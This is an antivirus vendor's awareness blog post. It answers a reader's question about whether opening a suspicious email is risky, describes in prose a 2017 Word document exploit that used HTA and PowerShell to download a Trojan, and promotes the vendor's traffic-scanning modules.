Don't even open
Wednesday, July 5, 2017
And I've got this question (it may seem naive) and I wanted to ask it for quite a while but issues about this topic wouldn't come up. Maybe it's a myth that I invented myself but to avoid infection I never open emails in my mailbox as well as short messages if the message or SMS appear suspicious to me (I check the subject line and a few words at the very beginning of a message which I can read without opening it). I mean that I not only refrain from doing foolish things (reply to messages, try to unsubscribe or open links or attached files), but I merely delete these emails/SMS without opening. And my question is this: can opening an email/SMS cause any problems if if I do not take any of the actions I've described above (in brackets)? I tend to think that if I just open an email/SMS, nothing bad should happen. But everything is possible.
Collective consciousness can work wonders. The threat the user is talking about indeed exists or, to be more precise, it existed at the moment when the question was asked. Those who remember mass mailings in the era of I love you know that thanks to vulnerabilities malicious actions could sometimes be carried out even without opening an email—receiving it by a mail client was enough. That's why Dr.Web features the HTTP monitor SpIDer Gate™ as well the SpIDer Mail monitor to scan scan traffic before it is processed by a receiving application in a protected system.
We assumed that threats of this kind ceased to exist and intended to talk about it in a history column of our project. But suddenly just a few days later…
This vulnerability was detected in Microsoft Word. Cybercriminals have developed an active exploit for this application in the form of a Microsoft Word document. Once this document is opened, another file called doc.doc is loaded. It contains an embedded HTA script, detected by Dr.Web as PowerShell.DownLoader.72. This HTA script, written using Windows Script syntax, calls the command interpreter PowerShell. PowerShell processes another malicious script that downloads an executable file to the attacked computer.
Currently, cybercriminals use this mechanism to install Trojan.DownLoader24.49614 on the computers of their victims. This Trojan downloads and runs other malicious software on infected machines.
It means that to get a machine infected, one only needs to try opening the document—the system will have been compromised before you'll see the contents.
#vulnerability #exploit #emailThe Anti-virus Times recommends
- Believing that a system will never get infected because you see what you are doing is dangerous. The exploit we described above will do its job while you won't notice anything.
- An anti-virus doesn't incorporate useless modules. Dr.Web SpIDer Gate is responsible for scanning traffic and will prevent threats of this kind from being saved in a system.
- Infection techniques similar to those described above don't fall out of use completely. Depending on availability of loopholes in a system, they may become more or less relevant. But believing that there will be no vulnerabilities and continuing to use a product that was developed without any consideration for such risks is to take the matter lightly.
And the vigilant user surely gets a well-deserved award ☺
Tell us what you think
To leave a comment, you need to log in under your Doctor Web site account. If you don't have an account yet, you can create one.
Comments
Неуёмный Обыватель
04:19:41 2018-07-22
vasvet
06:49:43 2018-07-21